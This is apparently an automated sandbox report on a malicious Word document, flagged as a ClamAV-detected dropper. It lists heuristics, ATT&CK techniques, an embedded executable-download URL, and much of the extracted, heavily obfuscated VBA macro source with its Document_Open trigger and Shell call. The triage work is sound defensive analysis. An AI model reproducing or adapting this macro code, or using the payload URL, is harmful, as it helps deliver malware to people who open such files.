MALICIOUS
272
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is an Office document containing VBA macros, specifically a Document_Open macro that calls a shell execution function. Heuristics indicate a macro-enable lure and ClamAV detections confirm it is a dropper. The VBA code is heavily obfuscated, but the presence of a Document_Open macro and the shell call strongly suggest it's designed to download and execute a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6837211-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6837211-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
vPID = Shell(itah, 1.1 / 1.1 * 1.1 - 1.1) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://mfae.info/newwork/fresh/soft.exe In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 34022 bytes |
SHA-256: 0d859e15b2434d05b0e442768c79cdbc7674e411c74639d9ef831c18d03717f5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
220 of 363 identifiers look randomly generated (e.g. 'iwwnhwibhhtlmyqtwbftwwzcxbidqrwirzacwowp') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Call pcxqujdhubpxk
End Sub
Private Sub pcxqujdhubpxk()
Dim er23405356234 As Byte
Dim uevfuvsexuj As Date
Dim atp
Dim cnwlbgsitp
If 0 = 23 Then
Else
Dim wezzglfqlidvpdj
Dim ktjtqmqf
Dim ychkhyc As Variant
Dim lrsjqzfnfgszyogr As Date
Dim uemjcvawblluyw
Dim zzbpzdke
Dim zhlwnlilbsrav
lrsjqzfnfgszyogr = 44
Do While 675 < 5
Select Case gsjgpz
Case "¢µñð?ÈäÍɵ?ó¨§", "«¼ôð?ÆçËÖ²?å°", "?ÃÛð?°ö½Ü±?ë??Äì"
kmjbutl = "?Éðó?¶"
Case "§ºñë?Â", "©³æò Çî¶Õ¤?à«�ÔÖ"
suffix = "?ÊÞè?½ò¿Ò¦?î°¦Ó×"
Case "?¸ã", "?Ëáó�¯ê¹Î®?Û®§ÂÖ"
kmjbutl = "§¸ôé?¼ó½×®?å¤?"
Case Else
lxtpcxu = "uytpohlhfxynor"
End Select
Dim mrdlgmohddaior
Dim zohiilgbfiufvvc
Dim uxivczfzemzz
Exit Do
Randomize
Loop
Dim ptshguapqpwijar As Variant
Dim sxvc As Date
Dim mfesg
Dim iljfsutra
Dim ivnunjxlyj
sxvc = 14
Do While 466 < 1
Select Case gbsqpgssnxqptzs
Case "?¼ñß?ÃìÍÏ �", " Ãè", "�ºôæ¤"
ievbkqlplekxse = "?²ëì?¿ß¶Éª?ñ§¤Ñ"
Case "«¸Ý÷?»æÇÓª?Û©¤Îè", "©·ßñ£°í¸Ø´?Ú?"
suffix = "«Åßß"
Case " ¼éê?ÇïÍÓ?", "?Ãëî?"
ievbkqlplekxse = "?ºÜç?Ä"
Case Else
urupfclpqorfnv = "soqtrnedgjueyk"
End Select
Dim hyhrj
Dim hjnzz
Dim wubqzhxkgftovv
Exit Do
Randomize
Loop
Dim vcmnigkb As Variant
Dim jzdcubvpoosbjsfm As Date
Dim eisyfupxikhigebr
Dim nohcokko
Dim oktqhyxoltgjgo
jzdcubvpoosbjsfm = 73
Do While 539 < 4
Select Case wvsmj
Case "£²Üì ÃîÆÉ³ éª", "£Ëàì¡ÆäÀÎ", "?¹åæ?»òÄÊ??àª"
dojnmd = "?Ääë?½ê¶"
Case "?¹îá¢ÅîÁס?ï£?Íä", "¡²ãå "
suffix = "¦Çêï¤ÇÞ»Ö£"
Case "?¶Ûê Âé¹Ô´ ë??", " ÆÝí?¶äÄÕ´?è?�"
dojnmd = "©Ãê"
Case Else
nbtgtsrumqc = "sbzjzeob"
End Select
Dim vfcdfkwblup
Dim zapwqycogfs
Dim kcuxal
Exit Do
Randomize
Loop
Dim zugoboovhjj As Variant
Dim tljtjknixcxgh As Date
Dim gblsfugmpujt
Dim djzufbrldjhsq
Dim mmzxoiwamnzqcnt
tljtjknixcxgh = 39
Do While 551 < 7
Select Case nprxg
Case "?Åèå?Å", "?Âîë?·æ¶Ï«", "¥¹ñæ�Åî¹Ú¥"
uemyxtnrtvvcfunr = "?´Ýâ?¸ÞÉÛ"
Case "¦Àäô?Èë¹Ò?", "£»é÷?°ã¾Û³?ó®"
suffix = "?Éßè?Ãï¿Ú¯?ì?"
Case "?¸Ûì�¼àÍÙ´?ð", "?Åèß�½å½Ù³"
uemyxtnrtvvcfunr = "?¼äö?¸óÍÒ¨?Þ"
Case Else
sgynjyhtgtzd = "bblaifn"
End Select
Dim tzwq
Dim gehsphjmduzgo
Dim nnkhznt
Exit Do
Randomize
Loop
End If
If 9 = 8 Then
Dim xecjlupnnv
Else
Dim kcmkeczh
Dim qspwmwppsgseidp As String
qspwmwppsgseidp = "OBuQeWb"
Dim evflykb As String
evflykb = "fmqWdknDV"
Dim dldtemwrqm As String
dldtemwrqm = "."
Application.Run qspwmwppsgseidp & dldtemwrqm & evflykb
End If
Dim qgiv
Dim utdvkxq
End Sub
Attribute VB_Name = "OBuQeWb"
Const qmfrughwvlxgcva = 1
Const vzeslgdnsppz = 2924
Const diijapedgholvvn = 71
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function whyyubwthaztp Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function wqpab Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function djonudaycnalpn Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function hnwhbncsrigt Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function tvvynokhh Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function nymtdmj Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function whyyubwthaztp Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function wqpab Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare Function djonudaycnalpn Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function hnwhbncsrigt Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare Function tvvynokhh Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function nymtdmj Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
Private Const chammdlaa = 4
Const dnnujgumg = 5
Private Const hrs = 69
Const zaxtlaplntx = 6834291
Private Const vxunbboore = 2924
Const ojppiuyz = 941287083
Const lcecanqfnalclo = 783
Const xhar = 97
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function axrmqjyeevyx Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function pydbawvh Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function sadghrco Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function pvbnsrhgyurk Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function bemaoabkh Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function pfsxmsjkcjo Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function axrmqjyeevyx Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function pydbawvh Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare Function sadghrco Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function pvbnsrhgyurk Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare Function bemaoabkh Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function pfsxmsjkcjo Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
Private Const wzpixvilvcdd = 4
Const dwqekmc = 7
Private Const iirx = 96
Const sjxmdawegyag = 45
Private Const fturodlx = 783
Const ixtwtmmn = 496697748
Const fkehgvhmrsnewujo = 6821
Const korsjemojth = 94
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function izdqtffqlihux Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function cvdehk Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function dzcvml Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function lyxnopdugnoyp Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function qnmbwvmcpbw Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function rjtfkfovawu Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function izdqtffqlihux Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function cvdehk Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare Function dzcvml Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function lyxnopdugnoyp Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare Function qnmbwvmcpbw Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function rjtfkfovawu Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
Private Const xoi = 7
Const gcbu = 3
Private Const yhzsjcyefaznech = 81
Const vgaavsmofhik = 48147879
Private Const cwiqlzgnjfd = 6821
Const mzrfademvp = 2277189
Const zvbluk = 1
Const misnxjoavjh = 25
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function ewahtrvnoyrebg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function iqwesbhhuksn Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function ooamycpdyloxhnx Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function jbxifj Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function lptnjyicgccdp Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function mprlqvttjfv Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function ewahtrvnoyrebg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function iqwesbhhuksn Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare Function ooamycpdyloxhnx Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function jbxifj Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare Function lptnjyicgccdp Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function mprlqvttjfv Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
Private Const zqotlyzohmumraz = 2
Const ipgkxdmcytzcykz = 1
Private Const ruwmwfgdhqo = 52
Const nibzjguax = 0
Private Const bpmxxhg = 1
Const mule = 2
Const rcohaarkqjdagga = 37687435
Const cfxshcgglfzjjnim = 39
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function wrapexejdgsvuovt Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function rsi Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function uaugvyxuiq Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function yllcpo Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function lllngvgmdzmmn Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function hkrilgmjfhu Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function wrapexejdgsvuovt Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function rsi Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare Function uaugvyxuiq Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function yllcpo Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare Function lllngvgmdzmmn Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function hkrilgmjfhu Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
Private Const uaovsbh = 5
Const zadqhtw = 2
Private Const hgn = 99
Const acnydu = 3
Private Const cgdrvohydw = 37687435
Const gna = 707733492
Const utww = 395864979
Const witfhojqgxswe = 88
#If VBA7 Then
#Else
#End If
#If VBA7 Then
Private Declare PtrSafe Function veexg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function rgaozpwlddidy Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function hmoivj Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function rqgjdepcudgyon Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function xaqknqjrz Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function ojyymbzextfs Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function veexg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function rgaozpwlddidy Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare Function hmoivj Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function rqgjdepcudgyon Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare Function xaqknqjrz Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function ojyymbzextfs Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If
Private Const dqmkmhcyprhbcgva = 8
Const sjsygiivmci = 1
Private Const yevmbett = 32
Const devbbqiqvyko = 174163
Private Const mkbtkhgf = 395864979
Public Sub fmqWdknDV()
On Error Resume Next
NgoIBOB
Dim yjd As Integer
Dim wwhvtercjfmkukj As Double
Dim vxbg As Boolean
Dim vkrkoafuph As String
Dim ecekswuhy As String
Dim weEqXkJyxoptnhzRAQmkOCDONMN As Integer
Dim fzhyzhmrpfdjvvux As String
Dim ebqhktiqs As Boolean
Dim mixoftlgb As Double
Do Until 4810 = 4810
Dim jkethpsvqynxe
jkethpsvqynxe = wexk
Loop
Dim kzeyzask(863) As String
kzeyzask(2) = "?·ó礱ßÈΣ?"
kzeyzask(4) = "¨Çóñ?È"
kzeyzask(1) = "ªµÜá?·ßÊÔ®"
kzeyzask(4) = CStr(73)
If roxytcmy = "�Éèê ÂáÈß´?" Then
Dim yjd73
yjd73 = 6421642182#
End If
Select Case 17
Case Else
End Select
'kzeyzaskmixoftlgb2415ªµÜá?·ßÊÔ®
'?·ó礱ßÈΣ?¨Çóñ?Èvkrkoafuph
'ebqhktiqsvxbg71449
'7373
'vxbgmixoftlgb71449
'ecekswuhyvkrkoafuph2415
'weEqXkJyxoptnhzRAQmkOCDONMNecekswuhy010647
'ebqhktiqsvkrkoafuph
'yjdecekswuhy#Q14
'vkrkoafuphroxytcmy
'010647ecekswuhy
'2415ebqhktiqs
'731748973
'71449mixoftlgb
For avkoon = 1 To 2415
avkoon = avkoon + 7
Next
For blxrykxysi = 1 To 73
blxrykxysi = blxrykxysi + 7
Next
For cufbzpjuoejumsgjo = 1 To 7317489
cufbzpjuoejumsgjo = cufbzpjuoejumsgjo + 7
Next
For Each mxzetiebeoeuksh In ajtlxgm
If IsDate(aivlkbowk) And ((7317489 + 2415) / (10647 + 5273)) <> 933437780781# Then
yknaznxxzgtozfes = "mymizx" & CStr("wjjta")
End If
Next
For vzjiqfitvyiuflcp = 1 To 71449
vzjiqfitvyiuflcp = vzjiqfitvyiuflcp + 7
Next
For fdanma = 1 To 1
fdanma = fdanma + 8
Next
For ymrugiesrurrfq = 1 To 1
ymrugiesrurrfq = ymrugiesrurrfq + 7
Next
For niuhaaeuwzmgs = 1 To 10647
niuhaaeuwzmgs = niuhaaeuwzmgs + 7
Next
'vkoondanmadanmalxrykxysiknhho
'lxrykxysiknhhoxzetiebeoeukshdkuqpikivclxrykxysi
'ufbzpjuoejumsgjolxrykxysilxrykxysiknhho
'zjiqfitvyiuflcpxzetiebeoeukshmrugiesrurrfqknhho
'danmaxzetiebeoeukshiuhaaeuwzmgslxrykxysi
'mrugiesrurrfqknhhoxzetiebeoeukshdkuqpikivclxrykxysi
'iuhaaeuwzmgslxrykxysidkuqpikivclxrykxysi
'xzetiebeoeukshdkuqpikivclxrykxysi
'jkethpsvqynxezjiqfitvyiuflcpdanmadkuqpikivclxrykxysi
'wexkdanmaknhho
'pkjndofbjiwqwxzetiebeoeukshbxooxzjiqfitvyiuflcp
'dkuqpikivclxrykxysidkuqpikivclxrykxysi
'knhhoiuhaaeuwzmgslxrykxysi
'tytpuhdanmamrugiesrurrfqknhho
'bxooxzjiqfitvyiuflcpmrugiesrurrfqknhho
'ªµÜá?·ßÊÔ®Q14
'¨Çóñ?ÈQ11
Dim zlsrxk As Integer
Dim ale As Double
Dim wsbqemctxbhsmrle As Boolean
Dim rhjqtu As String
Dim naknxcg As String
Dim nSFkfwKdEbnRoIGLKVEeVHDkiTn As Integer
Dim laiwzcx As String
Dim mhqgvtzzvebizh As Boolean
Dim fbij As Double
Do Until 5701 = 5701
Dim fbvi
fbvi = nykjsq
Loop
Dim yrgyfuhhittdromb(475) As String
yrgyfuhhittdromb(7) = "©½ëß?ÀÞ¹ß "
yrgyfuhhittdromb(5) = "«¼òõ?ÈçºÜµ?á¯?Æ"
yrgyfuhhittdromb(2) = "£³ñð?¼éÇȱ?ï¦?"
yrgyfuhhittdromb(3) = CStr(22)
If oyxbbe = " ¿ëï?ÅëÈÙ±?å°?Ì" Then
Dim zlsrxk22
zlsrxk22 = 51078185012685#
End If
Select Case 46
Case Else
End Select
'yrgyfuhhittdrombfbij42£³ñð?¼éÇȱ?ï¦?
'©½ëß?ÀÞ¹ß «¼òõ?ÈçºÜµ?á¯?Ærhjqtu
'mhqgvtzzvebizhwsbqemctxbhsmrle6155809
'2222
'wsbqemctxbhsmrlefbij6155809
'naknxcgrhjqtu42
'nSFkfwKdEbnRoIGLKVEeVHDkiTnnaknxcg1
'mhqgvtzzvebizhrhjqtu
'zlsrxknaknxcg#Q14
'rhjqtuoyxbbe
'1naknxcg
'42mhqgvtzzvebizh
'953071422
'6155809fbij
For azasjpmpxiaoelu = 1 To 42
azasjpmpxiaoelu = azasjpmpxiaoelu + 3
Next
For bupmlvcjqwgfaagmj = 1 To 22
bupmlvcjqwgfaagmj = bupmlvcjqwgfaagmj + 8
Next
For cdplno = 1 To 9530714
cdplno = cdplno + 1
Next
For Each mwgosbrwexut In lhucnapytca
If IsDate(poqiohmcxf) And ((9530714 + 42) / (1 + 24086501)) <> 34149214059985# Then
mxxwelscx = "spfwebc" & CStr("ziqy")
End If
Next
For vhincbppgthyjoptk = 1 To 6155809
vhincbppgthyjoptk = vhincbppgthyjoptk + 1
Next
For fqqf = 1 To 5108944
fqqf = fqqf + 4
Next
For yayf = 1 To 5108944
yayf = yayf + 6
Next
For nypunfonchbzgo = 1 To 1
nypunfonchbzgo = nypunfonchbzgo + 1
Next
'zasjpmpxiaoeluqqfqqfupmlvcjqwgfaagmjfwgpxjgli
'upmlvcjqwgfaagmjfwgpxjgliwgosbrwexutzlfzbupmlvcjqwgfaagmj
'dplnoupmlvcjqwgfaagmjupmlvcjqwgfaagmjfwgpxjgli
'hincbppgthyjoptkwgosbrwexutayffwgpxjgli
'qqfwgosbrwexutypunfonchbzgoupmlvcjqwgfaagmj
'ayffwgpxjgliwgosbrwexutzlfzbupmlvcjqwgfaagmj
'ypunfonchbzgoupmlvcjqwgfaagmjzlfzbupmlvcjqwgfaagmj
'wgosbrwexutzlfzbupmlvcjqwgfaagmj
'fbvihincbppgthyjoptkqqfzlfzbupmlvcjqwgfaagmj
'nykjsqqqffwgpxjgli
'kgmsjawgosbrwexutvzoqybxwpvswrhincbppgthyjoptk
'zlfzbupmlvcjqwgfaagmjzlfzbupmlvcjqwgfaagmj
'fwgpxjgliypunfonchbzgoupmlvcjqwgfaagmj
'bjxwildqqfayffwgpxjgli
'vzoqybxwpvswrhincbppgthyjoptkayffwgpxjgli
'£³ñð?¼éÇȱ?ï¦?Q14
'«¼òõ?ÈçºÜµ?á¯?ÆQ11
Dim ychkhyc As Variant
Dim lrsjqzfnfgszyogr As Date
Dim uemjcvawblluyw
Dim zzbpzdke
Dim zhlwnlilbsrav
lrsjqzfnfgszyogr = 44
Do While 675 < 5
Select Case gsjgpz
Case "¢µñð?ÈäÍɵ?ó¨§", "«¼ôð?ÆçËÖ²?å°", "?ÃÛð?°ö½Ü±?ë??Äì"
kmjbutl = "?Éðó?¶"
Case "§ºñë?Â", "©³æò Çî¶Õ¤?à«�ÔÖ"
suffix = "?ÊÞè?½ò¿Ò¦?î°¦Ó×"
Case "?¸ã", "?Ëáó�¯ê¹Î®?Û®§ÂÖ"
kmjbutl = "§¸ôé?¼ó½×®?å¤?"
Case Else
lxtpcxu = "uytpohlhfxynor"
End Select
Dim mrdlgmohddaior
Dim zohiilgbfiufvvc
Dim uxivczfzemzz
Exit Do
Randomize
Loop
Dim ptshguapqpwijar As Variant
Dim sxvc As Date
Dim mfesg
Dim iljfsutra
Dim ivnunjxlyj
sxvc = 14
Do While 466 < 1
Select Case gbsqpgssnxqptzs
Case "?¼ñß?ÃìÍÏ �", " Ãè", "�ºôæ¤"
ievbkqlplekxse = "?²ëì?¿ß¶Éª?ñ§¤Ñ"
Case "«¸Ý÷?»æÇÓª?Û©¤Îè", "©·ßñ£°í¸Ø´?Ú?"
suffix = "«Åßß"
Case " ¼éê?ÇïÍÓ?", "?Ãëî?"
ievbkqlplekxse = "?ºÜç?Ä"
Case Else
urupfclpqorfnv = "soqtrnedgjueyk"
End Select
Dim hyhrj
Dim hjnzz
Dim wubqzhxkgftovv
Exit Do
Randomize
Loop
Dim vcmnigkb As Variant
Dim jzdcubvpoosbjsfm As Date
Dim eisyfupxikhigebr
Dim nohcokko
Dim oktqhyxoltgjgo
jzdcubvpoosbjsfm = 73
Do While 539 < 4
Select Case wvsmj
Case "£²Üì ÃîÆÉ³ éª", "£Ëàì¡ÆäÀÎ", "?¹åæ?»òÄÊ??àª"
dojnmd = "?Ääë?½ê¶"
Case "?¹îá¢ÅîÁס?ï£?Íä", "¡²ãå "
suffix = "¦Çêï¤ÇÞ»Ö£"
Case "?¶Ûê Âé¹Ô´ ë??", " ÆÝí?¶äÄÕ´?è?�"
dojnmd = "©Ãê"
Case Else
nbtgtsrumqc = "sbzjzeob"
End Select
Dim vfcdfkwblup
Dim zapwqycogfs
Dim kcuxal
Exit Do
Randomize
Loop
Dim zugoboovhjj As Variant
Dim tljtjknixcxgh As Date
Dim gblsfugmpujt
Dim djzufbrldjhsq
Dim mmzxoiwamnzqcnt
tljtjknixcxgh = 39
Do While 551 < 7
Select Case nprxg
Case "?Åèå?Å", "?Âîë?·æ¶Ï«", "¥¹ñæ�Åî¹Ú¥"
uemyxtnrtvvcfunr = "?´Ýâ?¸ÞÉÛ"
Case "¦Àäô?Èë¹Ò?", "£»é÷?°ã¾Û³?ó®"
suffix = "?Éßè?Ãï¿Ú¯?ì?"
Case "?¸Ûì�¼àÍÙ´?ð", "?Åèß�½å½Ù³"
uemyxtnrtvvcfunr = "?¼äö?¸óÍÒ¨?Þ"
Case Else
sgynjyhtgtzd = "bblaifn"
End Select
Dim tzwq
Dim gehsphjmduzgo
Dim nnkhznt
Exit Do
Randomize
Loop
a = Left("EYpEvwWiGz MDmnQXPDN VCClJPxBut", 1)
'Right function
b = Left("PYpEvwWiGz MDmnQXPDN VCClJPxBut", 1)
c = Left("OYpEvwWiGz MDmnQXPDN VCClJPxBut", 1)
f = Right("HYpEvwWiGz MDmnQXPDN VCClJPxBuT", 1)
'Mid function
q = Mid("EYpEvwWiGz MDmnQXPDN VCClJPxBut", 1, 11)
'Split function
d = Split("EYpEvwWiGz MDmnQXPDN VCClJPxBut", " ")
For Each wrd In d
strg = strg & wrd & ", "
Next
